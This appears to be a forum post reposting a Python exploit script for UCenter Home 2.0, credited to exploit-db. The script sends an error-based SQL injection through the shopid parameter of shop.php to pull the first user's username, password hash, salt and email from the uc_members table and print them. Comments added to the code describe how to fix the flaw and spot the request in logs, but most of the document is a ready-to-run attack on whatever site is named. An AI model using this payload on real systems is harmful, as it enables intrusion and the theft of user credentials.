标题:
UCenter Home 2.0 EXP
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/env python
import sys
import urllib2
import re
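def info():
    """Print the script's attribution lines and its command-line usage."""
    # The 'From:' literal must stay on one line: a single-quoted string
    # cannot contain a raw line break.
    print 'From: http://www.exploit-db.com/exploits/14997/'
    print 'http://www.hake.cc/Web_loudong/'
    print 'changed:qiaoy'
    print 'exp:'
    print ' ./UCenter_Home_2.0.py site'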
def main():
    """Send one crafted shop.php request and print the fields echoed back.

    The SQL is carried entirely in the ``shopid`` query parameter, and the
    result is read out of a MySQL "Duplicate entry" error message. The
    script therefore only produces output where the application puts
    ``shopid`` into a query without treating it as an integer AND returns
    database error text in the HTTP response.

    Notes for defenders, all taken from the request below:
      * Validate/cast ``shopid`` as an integer or bind it as a query
        parameter, and do not show database errors to clients.
      * In web access logs, shop.php requests whose ``shopid`` contains
        ``information_schema``, ``floor(rand(0)*2)`` or ``uc_members``
        match this request.
      * A response body containing ``Duplicate entry '~'`` means the row
        was returned to the client.
      * The selected columns are uid, username, password, salt and email
        from ``ucenter.uc_members`` (``LIMIT 0,1``, i.e. the first row),
        so an affected site should treat that stored password value and
        salt as disclosed.
    """
    # Anything other than exactly one argument just prints the usage banner.
    if len(sys.argv) != 2:
        info()
        return

    site = sys.argv[1]
    # An explicit http:// or https:// URL is used as given; a bare host
    # name gets an http:// scheme prepended.
    if site[0:7] != 'http://' and site[0:8] != 'https://':
        site = 'http://' + site

    try:
        # The whole subquery rides in shopid; the group-by on
        # floor(rand(0)*2) is what provokes the duplicate-key error whose
        # text carries the concatenated columns, wrapped in ~'...'~ markers.
        url = site + '/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
        page = urllib2.urlopen(url).read()
        # Relies on the server reflecting the MySQL error text verbatim;
        # with error display disabled there is nothing to match and the
        # [0] index raises, landing in the handler below.
        leaked = re.findall(r'Duplicate entry \'~\'(.*?)\' for key', page)[0]
        # Columns were joined with ':' (0x3a): uid, username, password,
        # salt, email. Index 0 (uid) is not printed.
        fields = leaked.split(':')
        for label, position in (('Name: ', 1), ('Passwd: ', 2),
                                ('salt: ', 3), ('email: ', 4)):
            print label + fields[position]
    except:
        # Bare except: network errors, a missing error message and short
        # field lists all collapse into the same message.
        print 'Sorry,I can\'t work............'
# Run main() only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()